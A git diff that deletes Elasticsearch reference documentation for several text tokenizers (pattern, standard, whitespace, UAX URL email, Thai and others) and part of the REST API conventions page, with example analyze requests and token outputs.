TEST[continued] - - -It's also useful to be able to filter with file paths when combined with other -types of searches, such as this example looking for any files paths with `16` -that also must be in Alice's photo directory. - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "bool" : { - "must" : { - "match" : { "file_path" : "16" } - }, - "filter": { - "term" : { "file_path.tree" : "/User/alice" } - } - } - } -} --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/analysis/tokenizers/pattern-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/pattern-tokenizer.asciidoc deleted file mode 100644 index 112ba92bf59..00000000000 --- a/docs/reference/analysis/tokenizers/pattern-tokenizer.asciidoc +++ /dev/null @@ -1,275 +0,0 @@ -[[analysis-pattern-tokenizer]] -=== Pattern tokenizer -++++ -Pattern -++++ - -The `pattern` tokenizer uses a regular expression to either split text into -terms whenever it matches a word separator, or to capture matching text as -terms. - -The default pattern is `\W+`, which splits text whenever it encounters -non-word characters. - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern tokenizer uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "pattern", - "text": "The foo_bar_size's default is 5." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "foo_bar_size", - "start_offset": 4, - "end_offset": 16, - "type": "word", - "position": 1 - }, - { - "token": "s", - "start_offset": 17, - "end_offset": 18, - "type": "word", - "position": 2 - }, - { - "token": "default", - "start_offset": 19, - "end_offset": 26, - "type": "word", - "position": 3 - }, - { - "token": "is", - "start_offset": 27, - "end_offset": 29, - "type": "word", - "position": 4 - }, - { - "token": "5", - "start_offset": 30, - "end_offset": 31, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, foo_bar_size, s, default, is, 5 ] ---------------------------- - -[discrete] -=== Configuration - -The `pattern` tokenizer accepts the following parameters: - -[horizontal] -`pattern`:: - - A https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expression], defaults to `\W+`. - -`flags`:: - - Java regular expression https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html#field.summary[flags]. - Flags should be pipe-separated, eg `"CASE_INSENSITIVE|COMMENTS"`. - -`group`:: - - Which capture group to extract as tokens. Defaults to `-1` (split). - -[discrete] -=== Example configuration - -In this example, we configure the `pattern` tokenizer to break text into -tokens when it encounters commas: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "pattern", - "pattern": "," - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "comma,separated,values" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "comma", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "separated", - "start_offset": 6, - "end_offset": 15, - "type": "word", - "position": 1 - }, - { - "token": "values", - "start_offset": 16, - "end_offset": 22, - "type": "word", - "position": 2 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ comma, separated, values ] ---------------------------- - -In the next example, we configure the `pattern` tokenizer to capture values -enclosed in double quotes (ignoring embedded escaped quotes `\"`). The regex -itself looks like this: - - "((?:\\"|[^"]|\\")*)" - -And reads as follows: - -* A literal `"` -* Start capturing: -** A literal `\"` OR any character except `"` -** Repeat until no more characters match -* A literal closing `"` - -When the pattern is specified in JSON, the `"` and `\` characters need to be -escaped, so the pattern ends up looking like: - - \"((?:\\\\\"|[^\"]|\\\\\")+)\" - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "pattern", - "pattern": "\"((?:\\\\\"|[^\"]|\\\\\")+)\"", - "group": 1 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "\"value\", \"value with embedded \\\" quote\"" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "value", - "start_offset": 1, - "end_offset": 6, - "type": "word", - "position": 0 - }, - { - "token": "value with embedded \\\" quote", - "start_offset": 10, - "end_offset": 38, - "type": "word", - "position": 1 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces the following two terms: - -[source,text] ---------------------------- -[ value, value with embedded \" quote ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/simplepattern-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/simplepattern-tokenizer.asciidoc deleted file mode 100644 index 3e3de000275..00000000000 --- a/docs/reference/analysis/tokenizers/simplepattern-tokenizer.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[analysis-simplepattern-tokenizer]] -=== Simple pattern tokenizer -++++ -Simple pattern -++++ - -The `simple_pattern` tokenizer uses a regular expression to capture matching -text as terms. The set of regular expression features it supports is more -limited than the <> tokenizer, but the -tokenization is generally faster. - -This tokenizer does not support splitting the input on a pattern match, unlike -the <> tokenizer. To split on pattern -matches using the same restricted regular expression subset, see the -<> tokenizer. - -This tokenizer uses {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expressions]. -For an explanation of the supported features and syntax, see <>. - -The default pattern is the empty string, which produces no terms. This -tokenizer should always be configured with a non-default pattern. - -[discrete] -=== Configuration - -The `simple_pattern` tokenizer accepts the following parameters: - -[horizontal] -`pattern`:: - {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expression], defaults to the empty string. - -[discrete] -=== Example configuration - -This example configures the `simple_pattern` tokenizer to produce terms that are -three-digit numbers - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "simple_pattern", - "pattern": "[0123456789]{3}" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "fd-786-335-514-x" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens" : [ - { - "token" : "786", - "start_offset" : 3, - "end_offset" : 6, - "type" : "word", - "position" : 0 - }, - { - "token" : "335", - "start_offset" : 7, - "end_offset" : 10, - "type" : "word", - "position" : 1 - }, - { - "token" : "514", - "start_offset" : 11, - "end_offset" : 14, - "type" : "word", - "position" : 2 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces these terms: - -[source,text] ---------------------------- -[ 786, 335, 514 ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/simplepatternsplit-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/simplepatternsplit-tokenizer.asciidoc deleted file mode 100644 index 0bf82fa3960..00000000000 --- a/docs/reference/analysis/tokenizers/simplepatternsplit-tokenizer.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[analysis-simplepatternsplit-tokenizer]] -=== Simple pattern split tokenizer -++++ -Simple pattern split -++++ - -The `simple_pattern_split` tokenizer uses a regular expression to split the -input into terms at pattern matches. The set of regular expression features it -supports is more limited than the <> -tokenizer, but the tokenization is generally faster. - -This tokenizer does not produce terms from the matches themselves. To produce -terms from matches using patterns in the same restricted regular expression -subset, see the <> -tokenizer. - -This tokenizer uses {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expressions]. -For an explanation of the supported features and syntax, see <>. - -The default pattern is the empty string, which produces one term containing the -full input. This tokenizer should always be configured with a non-default -pattern. - -[discrete] -=== Configuration - -The `simple_pattern_split` tokenizer accepts the following parameters: - -[horizontal] -`pattern`:: - A {lucene-core-javadoc}/org/apache/lucene/util/automaton/RegExp.html[Lucene regular expression], defaults to the empty string. - -[discrete] -=== Example configuration - -This example configures the `simple_pattern_split` tokenizer to split the input -text on underscores. - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "simple_pattern_split", - "pattern": "_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "an_underscored_phrase" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens" : [ - { - "token" : "an", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, - { - "token" : "underscored", - "start_offset" : 3, - "end_offset" : 14, - "type" : "word", - "position" : 1 - }, - { - "token" : "phrase", - "start_offset" : 15, - "end_offset" : 21, - "type" : "word", - "position" : 2 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces these terms: - -[source,text] ---------------------------- -[ an, underscored, phrase ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/standard-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/standard-tokenizer.asciidoc deleted file mode 100644 index 2ea16ea5f6a..00000000000 --- a/docs/reference/analysis/tokenizers/standard-tokenizer.asciidoc +++ /dev/null @@ -1,268 +0,0 @@ -[[analysis-standard-tokenizer]] -=== Standard tokenizer -++++ -Standard -++++ - -The `standard` tokenizer provides grammar based tokenization (based on the -Unicode Text Segmentation algorithm, as specified in -https://unicode.org/reports/tr29/[Unicode Standard Annex #29]) and works well -for most languages. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "standard", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumped, over, the, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `standard` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -[discrete] -=== Example configuration - -In this example, we configure the `standard` tokenizer to have a -`max_token_length` of 5 (for demonstration purposes): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "standard", - "max_token_length": 5 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumpe", - "start_offset": 24, - "end_offset": 29, - "type": "", - "position": 5 - }, - { - "token": "d", - "start_offset": 29, - "end_offset": 30, - "type": "", - "position": 6 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 7 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 8 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 9 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 10 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 11 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumpe, d, over, the, lazy, dog's, bone ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/thai-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/thai-tokenizer.asciidoc deleted file mode 100644 index f1cc77c5b08..00000000000 --- a/docs/reference/analysis/tokenizers/thai-tokenizer.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[[analysis-thai-tokenizer]] -=== Thai tokenizer -++++ -Thai -++++ - -The `thai` tokenizer segments Thai text into words, using the Thai -segmentation algorithm included with Java. Text in other languages in general -will be treated the same as the -<>. - -WARNING: This tokenizer may not be supported by all JREs. It is known to work -with Sun/Oracle and OpenJDK. If your application needs to be fully portable, -consider using the {plugins}/analysis-icu-tokenizer.html[ICU Tokenizer] instead. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "thai", - "text": "การที่ได้ต้องแสดงว่างานดี" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "การ", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "ที่", - "start_offset": 3, - "end_offset": 6, - "type": "word", - "position": 1 - }, - { - "token": "ได้", - "start_offset": 6, - "end_offset": 9, - "type": "word", - "position": 2 - }, - { - "token": "ต้อง", - "start_offset": 9, - "end_offset": 13, - "type": "word", - "position": 3 - }, - { - "token": "แสดง", - "start_offset": 13, - "end_offset": 17, - "type": "word", - "position": 4 - }, - { - "token": "ว่า", - "start_offset": 17, - "end_offset": 20, - "type": "word", - "position": 5 - }, - { - "token": "งาน", - "start_offset": 20, - "end_offset": 23, - "type": "word", - "position": 6 - }, - { - "token": "ดี", - "start_offset": 23, - "end_offset": 25, - "type": "word", - "position": 7 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ การ, ที่, ได้, ต้อง, แสดง, ว่า, งาน, ดี ] ---------------------------- - -[discrete] -=== Configuration - -The `thai` tokenizer is not configurable. diff --git a/docs/reference/analysis/tokenizers/uaxurlemail-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/uaxurlemail-tokenizer.asciidoc deleted file mode 100644 index 4ec3a035c54..00000000000 --- a/docs/reference/analysis/tokenizers/uaxurlemail-tokenizer.asciidoc +++ /dev/null @@ -1,196 +0,0 @@ -[[analysis-uaxurlemail-tokenizer]] -=== UAX URL email tokenizer -++++ -UAX URL email -++++ - -The `uax_url_email` tokenizer is like the <> except that it -recognises URLs and email addresses as single tokens. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "uax_url_email", - "text": "Email me at john.smith@global-international.com" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Email", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "me", - "start_offset": 6, - "end_offset": 8, - "type": "", - "position": 1 - }, - { - "token": "at", - "start_offset": 9, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "john.smith@global-international.com", - "start_offset": 12, - "end_offset": 47, - "type": "", - "position": 3 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ Email, me, at, john.smith@global-international.com ] ---------------------------- - -while the `standard` tokenizer would produce: - -[source,text] ---------------------------- -[ Email, me, at, john.smith, global, international.com ] ---------------------------- - -[discrete] -=== Configuration - -The `uax_url_email` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -[discrete] -=== Example configuration - -In this example, we configure the `uax_url_email` tokenizer to have a -`max_token_length` of 5 (for demonstration purposes): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "uax_url_email", - "max_token_length": 5 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "john.smith@global-international.com" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "john", - "start_offset": 0, - "end_offset": 4, - "type": "", - "position": 0 - }, - { - "token": "smith", - "start_offset": 5, - "end_offset": 10, - "type": "", - "position": 1 - }, - { - "token": "globa", - "start_offset": 11, - "end_offset": 16, - "type": "", - "position": 2 - }, - { - "token": "l", - "start_offset": 16, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "inter", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "natio", - "start_offset": 23, - "end_offset": 28, - "type": "", - "position": 5 - }, - { - "token": "nal.c", - "start_offset": 28, - "end_offset": 33, - "type": "", - "position": 6 - }, - { - "token": "om", - "start_offset": 33, - "end_offset": 35, - "type": "", - "position": 7 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ john, smith, globa, l, inter, natio, nal.c, om ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/whitespace-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/whitespace-tokenizer.asciidoc deleted file mode 100644 index 525c4bda4fa..00000000000 --- a/docs/reference/analysis/tokenizers/whitespace-tokenizer.asciidoc +++ /dev/null @@ -1,121 +0,0 @@ -[[analysis-whitespace-tokenizer]] -=== Whitespace tokenizer -++++ -Whitespace -++++ - -The `whitespace` tokenizer breaks text into terms whenever it encounters a -whitespace character. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "whitespace", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "Brown-Foxes", - "start_offset": 12, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "word", - "position": 8 - }, - { - "token": "bone.", - "start_offset": 51, - "end_offset": 56, - "type": "word", - "position": 9 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown-Foxes, jumped, over, the, lazy, dog's, bone. ] ---------------------------- - -[discrete] -=== Configuration - -The `whitespace` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. diff --git a/docs/reference/api-conventions.asciidoc b/docs/reference/api-conventions.asciidoc deleted file mode 100644 index a0e52f86566..00000000000 --- a/docs/reference/api-conventions.asciidoc +++ /dev/null @@ -1,709 +0,0 @@ -[[api-conventions]] -== API conventions - -The *Elasticsearch* REST APIs are exposed using <>. - -The conventions listed in this chapter can be applied throughout the REST -API, unless otherwise specified. - -* <> -* <> -* <> -* <> -* <> - -[[multi-index]] -=== Multi-target syntax - -Most APIs that accept a ``, ``, or `` request path -parameter also support _multi-target syntax_. - -In multi-target syntax, you can use a comma-separated list to run a request on -multiple resources, such as data streams, indices, or index aliases: -`test1,test2,test3`. You can also use {wikipedia}/Glob_(programming)[glob-like] -wildcard (`*`) expressions to target resources that match a pattern: `test*` or -`*test` or `te*t` or `*test*`. - -You can exclude targets using the `-` character: `test*,-test3`. - -IMPORTANT: Index aliases are resolved after wildcard expressions. This can -result in a request that targets an excluded alias. For example, if `test3` is -an index alias, the pattern `test*,-test3` still targets the indices for -`test3`. To avoid this, exclude the concrete indices for the alias instead. - -Multi-target APIs that can target indices support the following query -string parameters: - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -The defaults settings for the above parameters depend on the API being used. - -Some multi-target APIs that can target indices also support the following query -string parameter: - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=ignore_throttled] - -NOTE: Single index APIs, such as the <> and -<>, do not support multi-target -syntax. - -[[hidden-indices]] -==== Hidden indices - -Indices that are configured to be hidden with the <> setting are -excluded from mult-target queries by default. -To include hidden indices, you must specify the `expand_wildcards` parameter. - -The backing indices for data streams are hidden indices, -and some features like {ml} store information in hidden indices. - -Global index templates that match all indices are not applied to hidden indices. - -[[system-indices]] -==== System indices - -{es} modules and plugins can store configuration and state information in internal _system indices_. -You should not directly access or modify system indices -as they contain data essential to the operation of the system. - -IMPORTANT: Direct access to system indices is deprecated and -will no longer be allowed in the next major version. - -[[date-math-index-names]] -=== Date math support in index names - -Date math index name resolution enables you to search a range of time series indices, rather -than searching all of your time series indices and filtering the results or maintaining aliases. -Limiting the number of indices that are searched reduces the load on the cluster and improves -execution performance. For example, if you are searching for errors in your -daily logs, you can use a date math name template to restrict the search to the past -two days. - -Almost all APIs that have an `index` parameter support date math in the `index` parameter -value. - -A date math index name takes the following form: - -[source,txt] ----------------------------------------------------------------------- - ----------------------------------------------------------------------- - -Where: - -[horizontal] -`static_name`:: is the static text part of the name -`date_math_expr`:: is a dynamic date math expression that computes the date dynamically -`date_format`:: is the optional format in which the computed date should be rendered. Defaults to `yyyy.MM.dd`. Format should be compatible with java-time https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html -`time_zone`:: is the optional time zone. Defaults to `utc`. - -NOTE: Pay attention to the usage of small vs capital letters used in the `date_format`. For example: -`mm` denotes minute of hour, while `MM` denotes month of year. Similarly `hh` denotes the hour in the -`1-12` range in combination with `AM/PM`, while `HH` denotes the hour in the `0-23` 24-hour range. - -Date math expressions are resolved locale-independent. Consequently, it is not possible to use any other -calendars than the Gregorian calendar. - -You must enclose date math index name expressions within angle brackets, and -all special characters should be URI encoded. For example: - -[source,console] ----- -# PUT / -PUT /%3Cmy-index-%7Bnow%2Fd%7D%3E ----- - -[NOTE] -.Percent encoding of date math characters -====================================================== -The special characters used for date rounding must be URI encoded as follows: - -[horizontal] -`<`:: `%3C` -`>`:: `%3E` -`/`:: `%2F` -`{`:: `%7B` -`}`:: `%7D` -`|`:: `%7C` -`+`:: `%2B` -`:`:: `%3A` -`,`:: `%2C` -====================================================== - -The following example shows different forms of date math index names and the final index names -they resolve to given the current time is 22nd March 2024 noon utc. - -[options="header"] -|====== -| Expression |Resolves to -| `` | `logstash-2024.03.22` -| `` | `logstash-2024.03.01` -| `` | `logstash-2024.03` -| `` | `logstash-2024.02` -| `` | `logstash-2024.03.23` -|====== - -To use the characters `{` and `}` in the static part of an index name template, escape them -with a backslash `\`, for example: - - * `` resolves to `elastic{ON}-2024.03.01` - -The following example shows a search request that searches the Logstash indices for the past -three days, assuming the indices use the default Logstash index name format, -`logstash-yyyy.MM.dd`. - -[source,console] ----------------------------------------------------------------------- -# GET /,,/_search -GET /%3Clogstash-%7Bnow%2Fd-2d%7D%3E%2C%3Clogstash-%7Bnow%2Fd-1d%7D%3E%2C%3Clogstash-%7Bnow%2Fd%7D%3E/_search -{ - "query" : { - "match": { - "test": "data" - } - } -} ----------------------------------------------------------------------- -// TEST[s/^/PUT logstash-2016.09.20\nPUT logstash-2016.09.19\nPUT logstash-2016.09.18\n/] -// TEST[s/now/2016.09.20%7C%7C/] - -include::rest-api/cron-expressions.asciidoc[] - -[[common-options]] -=== Common options - -The following options can be applied to all of the REST APIs. - -[discrete] -==== Pretty Results - -When appending `?pretty=true` to any request made, the JSON returned -will be pretty formatted (use it for debugging only!). Another option is -to set `?format=yaml` which will cause the result to be returned in the -(sometimes) more readable yaml format. - - -[discrete] -==== Human readable output - -Statistics are returned in a format suitable for humans -(e.g. `"exists_time": "1h"` or `"size": "1kb"`) and for computers -(e.g. `"exists_time_in_millis": 3600000` or `"size_in_bytes": 1024`). -The human readable values can be turned off by adding `?human=false` -to the query string. This makes sense when the stats results are -being consumed by a monitoring tool, rather than intended for human -consumption. The default for the `human` flag is -`false`. - -[[date-math]] -[discrete] -==== Date Math - -Most parameters which accept a formatted date value -- such as `gt` and `lt` -in <>, or `from` and `to` -in <> -- understand date maths. - -The expression starts with an anchor date, which can either be `now`, or a -date string ending with `||`. This anchor date can optionally be followed by -one or more maths expressions: - -* `+1h`: Add one hour -* `-1d`: Subtract one day -* `/d`: Round down to the nearest day - -The supported time units differ from those supported by <> for durations. -The supported units are: - -[horizontal] -`y`:: Years -`M`:: Months -`w`:: Weeks -`d`:: Days -`h`:: Hours -`H`:: Hours -`m`:: Minutes -`s`:: Seconds - -Assuming `now` is `2001-01-01 12:00:00`, some examples are: - -[horizontal] -`now+1h`:: `now` in milliseconds plus one hour. Resolves to: `2001-01-01 13:00:00` -`now-1h`:: `now` in milliseconds minus one hour. Resolves to: `2001-01-01 11:00:00` -`now-1h/d`:: `now` in milliseconds minus one hour, rounded down to UTC 00:00. Resolves to: `2001-01-01 00:00:00` - `2001.02.01\|\|+1M/d`:: `2001-02-01` in milliseconds plus one month. Resolves to: `2001-03-01 00:00:00` - -[discrete] -[[common-options-response-filtering]] -==== Response Filtering - -All REST APIs accept a `filter_path` parameter that can be used to reduce -the response returned by Elasticsearch. This parameter takes a comma -separated list of filters expressed with the dot notation: - -[source,console] --------------------------------------------------- -GET /_search?q=kimchy&filter_path=took,hits.hits._id,hits.hits._score --------------------------------------------------- -// TEST[setup:my_index] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "took" : 3, - "hits" : { - "hits" : [ - { - "_id" : "0", - "_score" : 1.6375021 - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 3/"took" : $body.took/] -// TESTRESPONSE[s/1.6375021/$body.hits.hits.0._score/] - -It also supports the `*` wildcard character to match any field or part -of a field's name: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=metadata.indices.*.stat* --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "metadata" : { - "indices" : { - "my-index-000001": {"state": "open"} - } - } -} --------------------------------------------------- - -And the `**` wildcard can be used to include fields without knowing the -exact path of the field. For example, we can return the Lucene version -of every segment with this request: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=routing_table.indices.**.state --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "routing_table": { - "indices": { - "my-index-000001": { - "shards": { - "0": [{"state": "STARTED"}, {"state": "UNASSIGNED"}] - } - } - } - } -} --------------------------------------------------- - -It is also possible to exclude one or more fields by prefixing the filter with the char `-`: - -[source,console] --------------------------------------------------- -GET /_count?filter_path=-_shards --------------------------------------------------- -// TEST[setup:my_index] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "count" : 5 -} --------------------------------------------------- - -And for more control, both inclusive and exclusive filters can be combined in the same expression. In -this case, the exclusive filters will be applied first and the result will be filtered again using the -inclusive filters: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=metadata.indices.*.state,-metadata.indices.logstash-* --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\nPUT my-index-000003\nPUT logstash-2016.01\n/] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "metadata" : { - "indices" : { - "my-index-000001" : {"state" : "open"}, - "my-index-000002" : {"state" : "open"}, - "my-index-000003" : {"state" : "open"} - } - } -} --------------------------------------------------- - -Note that Elasticsearch sometimes returns directly the raw value of a field, -like the `_source` field. If you want to filter `_source` fields, you should -consider combining the already existing `_source` parameter (see -<> for more details) with the `filter_path` -parameter like this: - -[source,console] --------------------------------------------------- -POST /library/book?refresh -{"title": "Book #1", "rating": 200.1} -POST /library/book?refresh -{"title": "Book #2", "rating": 1.7} -POST 